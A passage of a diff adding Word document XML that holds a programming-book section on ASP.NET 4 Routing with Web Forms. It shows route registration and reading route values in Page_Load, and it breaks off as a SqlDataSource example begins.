+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Although the main focus of this book is on ASP.NET MVC, Routing is a core feature of ASP.NET, so you can use it with Web Forms as well. This section looks at ASP.NET 4, because it includes full support for Routing with Web Forms.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="para"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="216" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>In ASP.NET 4, you can add a reference to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>System.Web.Routing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> to your </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Global.asax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> and declare a Web Forms route in almost the exact same format as an ASP.NET MVC application:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>void</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Application_Start</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(object sender, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>EventArgs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>RegisterRoutes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>RouteTable.Routes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>private</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> void </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>RegisterRoutes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>RouteCollection</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> routes)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>routes.MapPageRoute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            "</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>product-search</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            "albums/search</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>/{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>term}",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            "~/AlbumSearch.aspx");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="para"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="216" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>The only real difference from an MVC route is the last parameter, in which you direct the route to a Web Forms page. You can then use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Page.RouteData</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> to access the route parameter values, like this:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>protected</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> void </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Page_Load</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(object sender, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>EventArgs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> term = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>RouteData.Values</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>["term"] as string;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   Label1.Text = "Search Results for: " + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Server.HtmlEncode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>term);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   ListView1.DataSource = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>GetSearchResults</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>term);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ListView1.DataBind(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="para"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="216" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">You can use Route values in your </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>markup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as well, using the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>:RouteParameter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> object to bind a segment value to a database query or command. For instance, using the preceding route, if you browsed to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="HTMLTypewriter"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>/albums/search/beck</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>, you can query by the passed route value using the following SQL command:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:SqlDataSource</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> id="SqlDataSource1" </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>runat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>="server"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:spacing w:before="96"/>
+        <w:rPr>
+          <w:color w:val="494B43"/>
+          <w:sz w:val="24"/>
